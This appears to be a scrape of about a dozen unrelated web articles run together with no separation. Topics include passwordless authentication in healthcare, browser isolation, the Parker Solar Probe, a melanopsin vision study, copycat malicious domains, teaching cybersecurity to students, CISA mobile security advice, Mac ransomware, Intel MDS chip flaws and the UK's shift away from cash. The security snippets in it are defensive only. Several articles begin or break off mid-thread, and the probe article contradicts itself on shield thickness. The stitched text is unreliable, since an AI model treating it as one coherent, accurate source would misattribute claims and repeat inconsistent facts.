Researchers have found that the combination of advanced neural networks, ready availability of huge masses of training data, and extremely powerful distributed GPU-based systems has given us the building blocks for creating intelligent, self-learning machines that can rival humans in understanding. As Google Fellow Jeff Dean explains, the rapid evolution in big data technologies over the past decade has positioned us well to now imbue machines with near human-level understanding. “We now have a pretty good handle on how to store and then perform computation on large data sets, so things like MapReduce and BigTable that we built at Google, and things like Spark and Hadoop really give you the tools that you need to manipulate and store data,” the legendary technologist said during last June’s Spark Summit in San Francisco. “But honestly, what we really want is not just a bunch of bits on disk that we can process,” Dean continues. “What we want [is] to be able to understand the data. We want to be able to take the data that our products or our systems can generate, and then [build] interesting levels of understanding.” […]
In 2022, healthcare was ranked as the most breached sector with some of the weakest passwords. This should come as no surprise. The COVID-19 pandemic, coupled with the resulting digital acceleration, has led to a burgeoning digital health industry in Asia that is expected to reach US$10 billion by 2025.
As healthcare organisations move further along their digital transformation journey and more of our health-related data being transmitted or stored online, there is an increasingly urgent need for companies to strengthen their cybersecurity postures. While there are various steps that healthcare organisations can take, it is important that they address one key issue: passwords.
The problem with passwords
The healthcare sector has long been plagued by data breaches, even before the pandemic. For example, in 2018, Singapore faced one of its worst data breach attacks. Hackers infiltrated the computers of SingHealth, Singapore’s largest group of healthcare institutions, and stole the personal particulars of 1.5 million patients – including that of the country’s prime minister’s.
More recently in January 2022, approximately 39 million health records were reportedly stolen from a hospital in Thailand and offered for sale on an internet database-sharing forum.
As we continue to see an upward trend of data breaches, one cannot help but ponder the question: What role do passwords play in such cyberattacks?
Experts have long warned about the fallibility of knowledge-based authentication such as passwords. Poorly managed, easily guessed, and stolen passwords are the most common reasons for data breaches. At the core, knowledge-based credentials like passwords are human-readable and can be pried out of users’ hands by hackers through various methods such as phishing, credential stuffing, or password spraying.
Even good cyber hygiene alone is insufficient as cyberthreats continue to evolve. For instance, the average user has nearly 200 pairs of usernames and passwords, which is challenging to remember and keep track of.
Particularly in the healthcare sector, where speed and efficiency are of the essence, this has led to many healthcare workers reusing the same few passwords. Such habits magnify the threat of an account takeover, as just one leaked password can put all other accounts at risk.
What are the options?
That said, how can we address these issues?
The answer lies in moving away from knowledge-based “secrets” like passwords to possession-based authentication methods that are simpler, faster, and more secure. Going passwordless takes the guesswork out of secure, frictionless authentication – an increasingly urgent priority as healthcare goes digital. These techniques leverage devices that we have at our fingertips, such as using smartphone biometrics or a hardware security key.
While this requires only a single gesture by the user, behind the scenes an advanced cryptographic authentication dialogue takes place between a “private key” stored securely on the user’s device and its “public key” counterpart on the service provider’s server. Relying on advanced cryptographic algorithms instead of human recollection makes the authentication process far more secure. Furthermore, going passwordless leaves plenty of options for authentication: for instance, when a healthcare worker is wearing gloves, he or she can use either facial recognition or a PIN to access the system. Such an approach has been proven to be resistant to phishing and account takeovers.
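A stripped-down sketch of that dialogue, using the third-party Python cryptography package for Ed25519 signatures, is shown below; real FIDO2/WebAuthn deployments add origin checks, signature counters, and attestation on top:

```python
import os
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Enrollment: the key pair is created on the device; only the public key is shared.
device_key = Ed25519PrivateKey.generate()
server_public_key = device_key.public_key()

# Login: the server issues a fresh random challenge...
challenge = os.urandom(32)

# ...the device signs it locally, gated by a fingerprint or PIN gesture...
signature = device_key.sign(challenge)

# ...and the server verifies the signature. There is no shared secret to phish.
server_public_key.verify(signature, challenge)  # raises InvalidSignature on failure
print("authenticated")
```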
Users of digital health services will be looking for convenient and seamless online experiences, and that starts with the login process. A report by Jumio showed that 63% of consumers are more likely to engage with a business in the healthcare industry that performs robust identity verification, highlighting authentication as an important factor when choosing to engage with an organisation.
Passwordless authentication is the new reality
Passwordless authentication is fast becoming our new reality as more companies pledge to eliminate passwords. Big tech companies like Google, Microsoft, and Apple have also already expanded their support for a common passwordless sign-in standard – potentially paving the way for hundreds of millions of users to go password-free soon.
There is no better time than now for the healthcare industry to take a step forward to adopt common passwordless sign-in standards, especially as many organisations in the sector embrace digital transformation. Of course, it is crucial to note that standardised authentication alone cannot solve security issues unless it is widely adopted throughout the healthcare industry.
Overall, a consistent approach to security and standardised authentication that flows across healthcare platforms and apps is urgently needed to protect patients and their health data.
Maybe you noticed this news item from just a short while ago: a developer at A9t9, creators of the CopyFish Browser extension, was duped into opening a link in a phishing email. Clicking that fraudulent link sent the developer to a fake Google Account login page where he entered credentials, giving the hacker access to the developer’s A9t9 account. With this access, the hacker pushed a malicious update of CopyFish extension to Chrome users, allowing potentially malicious adware to be loaded onto vulnerable users’ computers. As of this writing, the attackers still have control of the extension: Anyone still running it is advised to uninstall — pronto.
While this story is particularly galling, attacks that infect computers via application and browser vulnerabilities are a dime a dozen. The Ponemon Institute estimates that 75% of companies have been affected at some point by browser and application-based malware and attacks like these generate about 80% of malware on corporate networks.
How Browser and Application-based Malware Does its Dirty Work
Browser and application-based malware makes its way onto computers and devices in many ways. In one classic delivery method, the attacker creates a malware-laced banner or ad (referred to as a malvertisement). Sad to say, this isn’t much of a challenge. He or she submits the “ad” to legitimate third-party advertising networks, which serve the websites that host ads.
These networks don’t necessarily check the legitimacy of ads submitted to them. In some cases, they actually do check out ads to be sure they aren’t malicious. Smart attackers, however, program malvertisements to remain benign until delivery to the websites where they’ll be displayed. Either way, when an unsuspecting user’s browser lands on a page with an infected ad, the banner code scans the computer for application vulnerabilities. When and if it finds one, it essentially “drops” the malware into that hole, and voila, the user’s got malware.
To get the most bang for their buck, attackers use attack vectors such as Java, Adobe Reader and Flash, and Internet Explorer, which are among the most commonly installed applications. This helps them reach the widest range of victims and do a great deal of damage with little effort on their part.
Just think about Adobe Flash, banned from iOS by Steve Jobs back in 2010. This less-than-secure application has been a hacker favorite for years because in its heyday, almost everybody had it installed. Malware distributors knew they could rely on ’old faithful’ to have some new, yet-unpatched vulnerability that they could exploit to spread malware. Though Flash is slated to meet its maker in 2020, it still persists, vulnerabilities and all.
And here’s the rub: even if there were no Flash, no Reader and no Java, browser and application-based malware could still do its worst, because even the most secure applications and browsers can become compromised at times, as the CopyFish incident proved. While killing Flash is a good (great!) move, it’s hardly the end of internet-based threats.
This is just one of the reasons why Gartner’s report on the top 10 security solutions for 2017 names remote browsing — also known as browser isolation – as the answer to “the cesspool that is the internet”: “Information security architects can’t stop attacks but can contain damage by isolating end-user internet browsing sessions from enterprise endpoints and networks.”
Security Through Isolation
Browser isolation works by containing all activity in a disposable browsing session that gets “thrown away” each time a user logs off or simply closes the browser, or the browser tab that they’re in. With the right isolation solution, you can freely browse the web from any browser, OS and device, the same way you do today, without negatively impacting the user experience and without endangering your network.
All internet browsing sessions are routed through the isolation safe zone. Each time you create an additional browsing session or open an additional browser tab, an additional isolated browser container is spun up. All content is rendered as a visual stream in the original browser. It looks like the webpage, it acts like the webpage, it interacts like the webpage — it’s just completely secured from any potential infiltration. And when the session is over, the isolation zone container is destroyed, along with any malware it contains.
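Conceptually, the session lifecycle resembles the following sketch, which spins up a throwaway Docker container per browsing session; the image name is a placeholder, and commercial isolation products use their own hardened containers and streaming protocols:

```python
import subprocess
import uuid

class IsolatedBrowserSession:
    """One disposable container per browsing session, destroyed on close."""

    def __enter__(self):
        self.name = f"browser-{uuid.uuid4().hex[:8]}"
        # --rm deletes the container (and any malware inside it) when it stops
        subprocess.run(
            ["docker", "run", "-d", "--rm", "--name", self.name,
             "example/remote-browser"],  # placeholder image
            check=True,
        )
        return self

    def __exit__(self, *exc):
        subprocess.run(["docker", "stop", self.name], check=True)

with IsolatedBrowserSession():
    pass  # only a visual stream reaches the user's real browser
```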
Attackers are experts at changing things up, at finding new ways to get to the data they want. Don’t be caught playing catch-up! Isolating your browsers and applications from the web is the key to effectively blocking even zero-day exploits from all entry points, and fully — finally — prevent attackers from getting the access they crave.
NASA says the plan for the Parker Solar Probe is to orbit within 3.9 million miles of the sun’s surface. This is NASA’s first mission to the sun and its outermost atmosphere, called the corona. The mission is scheduled to end in June 2025.
The mission's objectives include tracing the flow of energy that heats and accelerates the sun's corona and solar wind, determining the structure and dynamics of the plasma and magnetic fields at the sources of the solar wind, and exploring the mechanisms that accelerate and transport energetic particles.
After liftoff from Kennedy Space Center in Florida, the Parker Solar Probe will become the first spacecraft to fly directly into the sun's atmosphere. A 20-day launch window for liftoff atop a Delta IV Heavy rocket opens July 31, 2018. NASA is sending a roughly 10-foot-high probe on the historic mission, which will put it closer to the sun than any spacecraft has ever been. Wearing a nearly 5-inch coat of carbon-composite solar shielding, the probe will explore the sun's atmosphere in a mission that begins in the summer of 2018, eventually orbiting within 3.9 million miles of the sun's surface.
The probe will reach a speed of 450,000 mph around the sun; on Earth, that speed would take someone from Philadelphia to Washington in one second, the agency said. The mission will also pass through the region where the highest-energy solar particles originate. Solar wind is the flow of charged gases from the sun that is present in most of the solar system. That wind screams past Earth at a million miles per hour, and disturbances in the solar wind cause disruptive space weather that impacts our planet. Space weather may not sound like something that concerns Earth, but surveys by the National Academy of Sciences have estimated that a solar event arriving without warning could cause $2 trillion in damage in the United States and leave parts of the country without power for a year.
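NASA's one-second claim is easy to sanity-check with back-of-the-envelope arithmetic. The Philadelphia-to-Washington distance of about 125 miles below is an approximation used purely for illustration:

```python
speed_mph = 450_000
miles_per_second = speed_mph / 3600           # 125.0 miles per second
philly_to_dc_miles = 125                      # rough straight-line distance
print(philly_to_dc_miles / miles_per_second)  # -> 1.0 second
```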
To reach its orbit around the sun, the Parker Solar Probe will make seven flybys of Venus, each providing a gravity assist that shrinks its orbit over the course of nearly seven years. The probe will eventually travel closer to the sun than Mercury, close enough to watch the solar wind whip up from subsonic to supersonic. When closest to the sun, the probe's 4½-inch-thick carbon-composite solar shields will have to withstand temperatures close to 2,500 degrees Fahrenheit; thanks to its design, the inside of the spacecraft and its instruments will remain at a comfortable room temperature.
The observations and data could provide insight into the physics of stars, change what we know about the mysterious corona, increase understanding of the solar wind and help improve forecasting of major space weather events. Those events can impact satellites and astronauts as well as systems on Earth, including the power grid and radiation exposure on airline flights, NASA said.
Mission renamed after astrophysicist
Initially called Solar Probe Plus, the mission was renamed after the astrophysicist Eugene Parker, 89, professor emeritus at the University of Chicago. In 1958, he published the first paper to describe the solar wind, the high-speed matter and magnetism constantly escaping the sun.
Reflexive system of the human eye
The human eye is not only for seeing; it also performs other important biological functions, including automatic visual reflexes.
According to a new study from the University of Pennsylvania, the reflexive system of the human eye also produces a conscious visual experience. The finding may help explain the high light sensitivity sometimes experienced by people with eye disease, migraine headaches and concussions.
The researchers created a special pulse of light that stimulates only melanopsin, a blue-light-sensitive protein in cells of the eye.
"Melanopsin is a part of our visual system and controls several important biological responses to light," said lead author Manuel Spitschan. It has been unclear whether a visual experience accompanies these reflexes, because the normal light that stimulates melanopsin will also stimulate the cone cells of the eye.
To solve this problem, the researchers developed a special kind of light pulse that stimulates melanopsin but is invisible to the cones. These pulses switch between computer-designed "rainbows" of light.
For testing, the researchers recorded the pupil responses of people who watched these light pulses. They confirmed that a light pulse invisible to the cones produces a slow, reflexive constriction of the pupil. They then measured brain activity and found that the brain's visual pathway responds to the melanopsin stimulus.
"This was a particularly exciting finding," said senior author Geoffrey K. Aguirre, MD, PhD, an associate professor of Neurology at Penn. A neural response within the occipital cortex suggests that people's conscious experience of melanopsin stimulation is explicitly visual.
The research may help explain the experience of people with photophobia. "Research on mice makes us think that melanopsin contributes to the sensation of discomfort from a very bright light," Aguirre said.
The new study found that the melanopsin stimulus itself causes discomfort, and people with photophobia may experience a stronger form of this response. The new tool could therefore help us better understand excessive light sensitivity.
More information: [PNAS]
Finjan has found that hackers and cyber-criminals are exploiting a loophole in the domain name registration process to infect visitors to legitimate websites and extend the life cycle of cyber-attacks.
Attacks using this method typically involve a “copycat” domain name that is strikingly similar in spelling to the domains of legitimate sites.
Leveraging the similarity to legitimate and frequently used domain names enables these attacks to go unnoticed by webmasters and security solution providers.
This abuse of trusted domain names as an attack vector was spotted in October by Finjan's Malicious Code Research Center (MCRC) while searching for popular services registered with a slight change to the top-level domain.
When Finjan's MCRC investigated http://go*gle-stat******.org/ (where * obscures some characters of the domain), it found that the site took advantage of a domain name similar to that of a legitimate, popular service and contained malicious code designed to download and execute a Trojan on the visitor's machine. The malicious code itself was located on the abused domain name.
When Finjan researched where the domain name hosting the malicious site was located, it came across another interesting finding: the code was hosted on a trusted, legitimately controlled IP address.
Shortly after contacting the security team of that domain, Finjan was notified that the necessary action had been taken.
A subsequent check showed that, indeed, the malicious code is no longer available on the hosting servers.
Since registering a domain name is not a process that is being adequately policed and scrutinized, cybercriminals can potentially create a malicious website using any domain name they like (provided it isn’t already taken).
Finjan’s research indicates that criminals have taken advantage of this loophole to create “copycat” sites intended to host web-based attacks, using intentionally misleading domain names.
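One way a defender might flag such copycat registrations is to measure how closely a new domain's tokens resemble a watchlist of popular brand names. The sketch below uses Python's standard-library difflib; the watchlist, threshold and example domain are illustrative choices, not values from Finjan's research.

```python
from difflib import SequenceMatcher

POPULAR = ["google", "paypal", "facebook"]   # illustrative brand watchlist

def copycat_report(domain):
    """Flag hyphen-separated tokens of a domain that nearly match a known brand."""
    tokens = domain.split(".")[0].split("-")
    for token in tokens:
        for brand in POPULAR:
            score = SequenceMatcher(None, token, brand).ratio()
            if 0.75 <= score < 1.0:          # close but not exact: classic copycat
                print(f"{domain}: '{token}' resembles '{brand}' ({score:.2f})")

copycat_report("go0gle-statistics.org")      # -> 'go0gle' resembles 'google' (0.83)
```

Registrars and certificate authorities could run a similar screen at registration or issuance time, escalating near-matches for manual review rather than blocking them outright.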
When using URL classification or reputation as a security solution, requests to URLs or domains known to be malicious can be blocked regardless of the content on the page; however, the effectiveness of blocking requests to known malicious domains relies on maintaining an up-to-date list of such sites.
Due to the rapid growth and volume of malware hosted online, gathering sufficient data as quickly as malicious domains appear (and disappear) on the web is almost impossible.
As website content is becoming more volatile, and domain names can be set up for brief periods of time, the task of “keeping track” of malicious content on the Web is becoming ever more difficult.
When attacks involve a domain name that is strikingly similar in spelling to the domains of legitimate sites and are hosted on trusted IP addresses, the similarity to legitimate and frequently used domain names enables them to go unnoticed by most webmasters.
Combined with code obfuscation and other evasive techniques, these scripts trigger attacks that result in malicious code – typically crimeware Trojans - being downloaded to the user’s machine.
It is therefore important for attacks to be detected in real time, without relying on the reputation of the host IP address or domain name.
Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime. ~ Maimonides
The education sector has had its share of breaches. And schools, like medical and retail institutions, continue to struggle when it comes to securing their highly prized assets: student and staff data and intellectual property. This is a big challenge for many. Unfortunately, it's not the only challenge they face.
The education sector is pressured to address skills shortage, not just within the cybersecurity industry but in their own as well. Educators are also faced with the challenge of teaching the current and future generation of students about cybersecurity and privacy, fields which for most of them are relatively new and challenging to learn. Furthermore, engaging students to start considering careers in cybersecurity—much less getting them interested and talking about it—is another hurdle to conquer.
Educators are left wondering, "How can I even begin to tackle all this?" Before we start concerning ourselves with what to do with students, here are two questions teachers must ask themselves first:
How prepared am I for this?
Remember that a mark of good teaching is knowledge of, a firm grasp on, and familiarity with the subject matter. Teachers both new and experienced who are willing to take up teaching cybersecurity can start off by learning more about the subject themselves, understanding why it's crucial that every citizen of every country play their part, and how they can make a difference in the burgeoning fight against cybercrime. There are some ways this can be done:
- Get trained. The National Initiative for Cybersecurity Careers and Studies (NICCS), an online resource and training hub managed by the Department of Homeland Security, offers cybersecurity training for educators for free. They can check out the materials on the NICCS official website.
- Seek mentors among experienced cybersecurity educators and/or professionals. It's always good to have someone show you the ropes on something you're not yet familiar with. The same is true for educators, and there's no shame in asking to be mentored. After all, educators can benefit from the best and brightest minds in this field, just as the students do.
- Teach yourself via the Internet. Self-learning is always an option, and there are free and available materials an educator can use for studying online. Cybersecurity Ventures also has a hefty list of private institutions that educators and their organizations can invite to do in-house training. Lastly, the National Initiative for Cybersecurity Education (NICE), which is a program of the National Institute of Standards and Technology in the Department of Commerce, has more materials teachers can pore over.
What methods can I use to introduce this new subject to my students?
Making cybersecurity palatable to K–12 students is something educators must prepare and plan ahead for. For some organizations, the availability of technology has made it easier for teachers to use methods beyond the blackboard and textbooks.
This doesn't mean that old yet effective methods of instruction are entirely forgotten. Instead, integrating technology must be used alongside tools that already work in a classroom. Technology also livens up the class, making it conducive for students to accept the new subject matter. TeachHub recommends that teachers undergo the four stages of technology integration, which are substitution, augmentation, modification, and redefinition, should they decide to take advantage of new learning tools using technology. And when it comes to training students on cybersecurity, it's a must.
We can't give what we don't have. In this case, educators cannot impart knowledge about cybersecurity without first gaining (or being in the process of gaining) sufficient learning about it themselves. So it's essential to undergo this step before moving on to the next.
Ways to get students interested and involved in cybersecurity
The majority of educators love teaching because they also like working with young kids. And starting them young is ideal for discussing cybersecurity. How young? Some say once they begin elementary school; for others, there is really no defined age. As long as the kids (1) are mentally mature enough to be taught the importance of safe computing, and (2) are already using technology, such as a smartphone or tablet, then we can say they are ready to take this new step in learning.
Like any list, the outline below isn't exhaustive. Nor is it an ordered list of steps; rather, it is a set of guidelines you can follow (or reject) at your discretion. As educators, you can branch out and look for other ways. Keep honing your methods and replacing them with new, more efficient ones. So, without further ado, below are the methods we propose for kids:
1. Join boot camps. Independent and private organizations can conduct cybersecurity camps for kids and teens. It's up to the educator to learn more about such programs, getting as much information as they can, and then choosing which camp they'd vouch for their students to join. Examples of camps are GenCyber, Cyber Camps by the US Cyber Challenge, and Tech Camps by ID Tech.
2. Join competitions. This is probably applicable from middle- to university-level contests that can be in-school or out-of-school. Examples are Carnegie Mellon's picoCTF, CyberFirst Girls Competition (in the UK), CyberPatriot, and Global Cyberlympics.
3. Go on tours. Some schools can organize trips within government and private sector offices that deal with cybersecurity.
4. Get an internship. Students as young as high school age can apply for internships at companies that have openings on their information security teams. An internship is the closest hands-on experience they can gain in a real-world setting. Educators can encourage their students to go for this, or go the extra mile and vouch for students to the companies where they want to intern.
5. Volunteer to teach younger generations about cybersecurity. This may apply to high school and university-level students who are about to graduate. Not only would this unburden educators from some teaching tasks, but it can also be a positive experience for students to put themselves in a mentor's shoes. Who knows — they might actually take an interest in teaching cybersecurity to the next generation.
And as for teachers, they can help students by doing the following:
1. Provide them a role model. Kids and teens need someone they can look up to or model themselves after, even when they don't realize it at first; this could explain why YouTube stars are so famous. If you want to encourage kids and teens to become experts in the field of their interest in the future, educators must introduce them to personalities they can emulate. Are the little girls in class fans of Taylor Swift? Mention that Swift is actually besties with Karlie Kloss, international supermodel and coder.
2. Develop their soft skills. While tech and coding skills may be necessary for several job positions, soft skills—especially when sharpened to the point of awesomeness—can not only get the post-grad through the door but can also keep them employed for a long time.
In a previous blog post, we asserted that if one wants to work in cybersecurity, they don't have to be too technical or know how to code. In fact, some are saying that the skills shortage being experienced in this industry is not about lacking technical people. Instead, the industry requires technical people who also have other skills like advanced reading, advanced writing, communication, management, organization, critical thinking, and troubleshooting skills. Most employers actually consider soft skills as more important than hard skills.
3. Recognize talents that they can use in cybersecurity. Some students may feel put off or inadequate in pursuing careers that they deem too technical. Musical individuals and those with above-average hand-eye coordination (e.g., video game players), they say, may have a high chance of success in the cybersecurity field. They are creative personalities who can think outside the box when it comes to problem solving and innovation, especially when properly trained. Educators can use the studies behind these claims to pique student interest for a start.
4. Provide a platform for students to learn, share, and apply what they learned. At this day and age, it may not be difficult to find a platform. We have already mentioned YouTube above. There is also GitHub for the code monkeys, and, if your child is into messaging instead of social networking sites to get in touch with their friends, there is Discord, where they can create a room and throw ideas around to members who can help refine them. There is also Twitch, where some game modders actually broadcast themselves coding and testing the code of the game they want to improve on.
5. Gamify learning. Gamification, or the use of game mechanics and design, to drive home important points that may otherwise leave students confused can bring about high engagement. Not to mention, it's extremely fun. There are some ways educators can apply this. They can change the class grading system from letter grades to "experience points" (or XP in the gaming world) as one teacher already demonstrated, awarding students with tangible incentives like badges, conduct tournaments among small groups within the class, and using actual games that teach about cybersecurity, privacy, and hacking. For middle- to high-school educators, assess if you can introduce your students to games like TIS-100, Shenzhen I/O, and Uplink. Zachtronics have more and various games to offer on their website.
6. Teach them the necessary security skills. One cannot be equipped to work in cybersecurity—or, in this day and age, in any industry—until they know basic cybersecurity hygiene. This is fundamental, but it shouldn't stop there. Students will learn and adapt better security techniques to protecting their own and company assets once they advance in their education and begin working. But having some sort of security cornerstone or foundation must be there to build on.
7. Ingrain in them the importance of continuous development. Education shouldn't begin and end in institutions. This may seem like a no-brainer, but it is important to remind students that although learning on the job is essential, it is equally important to make an effort to understand concepts they haven't encountered in the classroom by reading books and researching about them online. Life these days is fast-paced, and if one is not paying attention, valuable knowledge can just pass us by.
8. Expand cybersecurity education and training efforts to include all students. This may be applicable only in a university setting. Expanding cybersecurity education means that it shouldn't be only students in STEM courses being trained on it. The curriculum should include practical applications of security in their career of choice and how insecure practices may potentially jeopardize not just their employment but also the clients they serve. Real-world scenarios and examples are the best case studies.
The cool factor
While educators expose students to the exciting and highly positive aspects of cybersecurity, it's unavoidable for them to also see the other side of it: the exploits, methodologies, and (if the information is available) the people behind cybercrimes and threat actor groups that the cybersecurity industry is battling against.
Thanks to increased media coverage on successful breaches, availability of written works and videos on various hacktivist ideologies, and the dramatization of the misuse of computer and network prowess in television series and movies, students have more to internalize and mentally process today compared to previous generations. Unfortunately in today's culture, more and more are not taking the time to think things through before acting. In many instances, kids and teens like to do things because of "the cool factor" involved.
This isn't entirely a bad thing. The dramatization of hacking in TV and movies, no matter how poorly they were presented, has inadvertently put cybersecurity on the media map, undoubtedly sparking viewers' imaginations, helping form idealisms and dreams, and pushing intellectuals and creatives alike to pursue the "what ifs."
So if you hear students expressing sympathy over Elliot Alderson's plight in taking down an evil corporation that he works for, a liking to Penelope Garcia's focus and quick wit in the midst of life-or-death situations, or a deep fascination for Harold Finch's selflessness and fierce loyalty to the cause of saving and not taking lives, let them. But also bring them gently back down to reality and introduce eye-opening documentaries of real-life hackers and how the cyberculture came about.
CyberRisk named a few titles in a recent blog post, from Hackers in Wonderland (2000) to Hackers are People, Too (2008). Of course, we'd like to add The Triumph of the Nerds: The Rise of Accidental Empires (1996), Downloaded (2013), The Internet's Own Boy: The Story of Aaron Swartz (2014), Deep Web (2015), and Softwaring Hard (2014).
Heck, if these aren't cool for them, then I don't know what is.
The Cybersecurity and Infrastructure Security Agency (CISA) has released two actionable Capacity Enhancement Guides (CEGs) to help users and organizations improve mobile device cybersecurity.
One of the guides is intended for consumers. There are an estimated 294 million smartphone users in the US, which makes them an attractive target market for cybercriminals, especially considering that most of us use these devices every day.
The advice listed for consumers is basic and our regular readers have probably seen most of it before. But it never hurts to repeat good advice and it may certainly help newer visitors.
- Stay up to date. Make sure that your operating system (OS) and the apps you use are up to date, and enable automatic updating where possible.
- Use strong authentication. Make sure to use strong passwords or PINs to access your devices, and biometrics where possible and appropriate. For apps, websites and services, use multi-factor authentication (MFA) where possible (a worked one-time-password example follows this list).
- App security:
- Use curated app stores and stay away from apps that are offered through other channels. If they are not good enough for the curated app stores, they are probably not good for you either.
- Delete unneeded apps. Remove apps that you no longer use, not only to free up resources, but also to diminish the attack surface.
- Limit the amount of Personally Identifiable Information (PII) that is stored in apps.
- Grant least privilege access to all apps. Don't allow the apps more permissions than they absolutely need in order to do what you need them to do, and minimize their access to PII.
- Review location settings. Only allow an app to access your location when the app is in use.
- Network communications. Disable the network protocols that you are not using, like Bluetooth, NFC, WiFi, and GPS. And avoid public WiFi unless you can take the necessary security measures. Cybercriminals can use public WiFi networks, which are often unsecured, for attacks.
- Protection:
- Install security software on your devices.
- Use only trusted chargers and cables to avoid juice jacking. A malicious charger or PC can load malware onto smartphones that may circumvent protections and take control of them. A phone infected with malware can also pose a threat to external systems such as personal computers.
- Enable lost-device functions or a similar app. Use auto-wipe settings or apps to remove data after a certain number of failed logins, and enable the option to remotely wipe the device.
- Phishing protection. Stay alert, don't click on links or open attachments before verifying their origin and legitimacy.
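To see why the MFA advice above matters, it helps to look at how a time-based one-time password (TOTP) is generated: the code depends on a shared secret and the current time, so a phished password alone does not get an attacker in. Below is a minimal RFC 6238-style sketch using only the Python standard library; the secret is a made-up example, not anything from the CISA guides.

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32, period=30, digits=6):
    """Compute the current TOTP code for a base32-encoded shared secret."""
    key = base64.b32decode(secret_b32)
    counter = struct.pack(">Q", int(time.time()) // period)
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                 # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # example secret; codes rotate every 30 seconds
```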
The guide for organizations does duplicate some of the advice given to consumers, but it has a few extra points that we would like to highlight.
- Security focused device management. Select devices that meet enterprise requirements with a careful eye on supply chain risks.
- Use Enterprise Mobility Management solutions (EMM) to manage your corporate-liable, employee-owned, and dedicated devices.
- Deny access to untrusted devices. Devices should be considered untrusted if they have not been updated to the latest platform patch level; if they are not configured to enterprise standards and constantly monitored by the EMM; or if they are jailbroken or rooted. (A toy version of this policy check appears after this list.)
- App security. Isolate enterprise apps. Use security container technology to isolate enterprise data. Your organization’s EMM should be configured to prevent data exfiltration between enterprise apps and personal apps.
- Ensure app vetting strategy for enterprise-developed applications.
- Restrict OS/app synchronization. Prevent data leakage of sensitive enterprise information by restricting the backing up of enterprise data by OS/app-synchronization.
- Disable user certificates. User certificates should be considered untrusted because malicious actors can use malware hidden in them to facilitate attacks on devices, such as intercepting communications.
- Use secure communication apps and protocols. Many network-based attacks allow the attacker to intercept and/or modify data in transit. Configure the EMM to use VPNs between the device and the enterprise network.
- Protect enterprise systems. Do not allow mobile devices to connect to critical systems. Infected mobile devices can introduce malware to business-critical ancillary systems such as enterprise PCs, servers, or operational technology systems. Instruct users to never connect mobile devices to critical systems via USB or wireless. Also, configure the EMM to disable these capabilities.
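The "deny access to untrusted devices" criteria above boil down to a simple policy predicate. The sketch below is a toy illustration of that logic only, not a real EMM API; the field names and baseline patch date are invented for the example.

```python
from dataclasses import dataclass

ENTERPRISE_BASELINE_PATCH = "2021-11-01"   # invented baseline, ISO date format

@dataclass
class Device:
    patch_level: str           # ISO date string, so lexical comparison works
    emm_managed: bool          # configured and monitored by the EMM
    jailbroken_or_rooted: bool

def is_trusted(device: Device) -> bool:
    """Mirror the CEG's three conditions for treating a device as trusted."""
    return (device.patch_level >= ENTERPRISE_BASELINE_PATCH
            and device.emm_managed
            and not device.jailbroken_or_rooted)

print(is_trusted(Device("2021-10-01", True, False)))  # False: stale patch level
```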
While you may not feel the need to apply all the advice listed above, it is good to at least know about it and consider whether it fits into the security posture that matches your infrastructure and threat model.
Stay safe, everyone!
The first instances of ransomware attacks on Mac users were discovered this weekend. Ransomware is a type of malware that encrypts users’ data and then requires money or another form of ransom for the data to be released.
In the past, ransomware mostly targeted Android and Windows users. Researchers at Palo Alto Networks detected the first instance of ransomware among Mac products last Friday, when they discovered an OS X BitTorrent client installer infected by ransomware.
Researchers informed Apple of the infection immediately, and Apple revoked the security certificate that the ransomware distributors had initially used to bypass its protections. Apple's quick response prevented any other users from falling victim to the ransomware over the weekend.
Last week, Intel and independent security researchers announced that Intel chips have another flaw that could potentially let hackers pull sensitive information from microprocessors. The researchers say the flaw enables four new attacks, each of which can capture information like encryption keys and passwords — the quintessential building blocks of security for nearly all computing devices. Wired, which also reported on the research, said the flaw affects millions of PCs.
The flaw is in the same family as the 2018 Meltdown and Spectre flaws and shares many similarities with them. The new vulnerabilities are built into Intel hardware and go by various names, including ZombieLoad, Fallout, and RIDL; the more technical name is Microarchitectural Data Sampling (MDS).
How you should respond to MDS is probably exactly what you expect: update your operating system when it asks you to, and make sure your browser is up to date — either can be a vector for these new attacks. Only devices running on Intel chips are affected (though that covers everything from 2011 through fairly recent chips), so iOS devices and the vast majority of Android devices are safe. It should also be said that there have been no reported exploits taking advantage of these vulnerabilities in the wild.
Intel said in a statement that the best way to protect yourself from attacks targeting this flaw is to keep your system software updated. The flaw has been fixed on Intel Core processors from the 8th and 9th generations, as well as the 2nd generation of the Intel Xeon Scalable processor family. Other chips can be fixed with updates to software called microcode, which solves the problem without having to rewrite the hard-coded features of a microprocessor.
Here are the MDS information pages from a bunch of big software vendors, all of whom have already provided patches or will do so in the very near future:
- Red Hat
The announcement indicates that this type of flaw, which was novel when reports of Meltdown and Spectre were first announced, is an area of intense research, and experts might continue to find serious chip flaws down the road. Intel and other chip makers face the challenge of addressing flaws that allow these kinds of attacks without sacrificing the performance of their microprocessors.
The company also released data on how its fixes to the flaw are affecting different processors’ performance.
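If you run Linux, you can check whether your kernel and microcode carry the MDS fixes by reading the status entry the kernel publishes in sysfs. The sketch below assumes a kernel recent enough to expose that file:

```python
from pathlib import Path

mds = Path("/sys/devices/system/cpu/vulnerabilities/mds")
if mds.exists():
    # Typical values: "Not affected", "Vulnerable", or
    # "Mitigation: Clear CPU buffers; SMT vulnerable"
    print("MDS status:", mds.read_text().strip())
else:
    print("No MDS entry; the kernel may predate the disclosure.")
```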
In many ways, the UK is progressing towards becoming a cashless society. Despite this, there is a range of barriers threatening to undermine the UK’s ability to fully embrace this transition. From a lack of trust in new technology to a sentimental connection to existing payment methods, these barriers must be both identified and overcome if the UK is to operate in the modern climate.
The latest Access to Cash review revealed debit cards are now the most popular payment method in the country. But the decline of cash payments is not good news for all of us. Around 8,000,000 UK adults — 17% of the population — would struggle to cope in a cashless society. Many of these are from vulnerable groups: the poor, those with physical and/or mental health challenges and people without bank accounts are all disproportionately likely to rely on cash.
While the UK as a whole has been rated among the nations most ready to go cashless, some residents are clearly readier than others.
As things stand, a cashless UK would exclude a large number of people.
So, what are the greatest barriers to the UK’s cashless society and how can they best be tackled?
Who relies on cash?
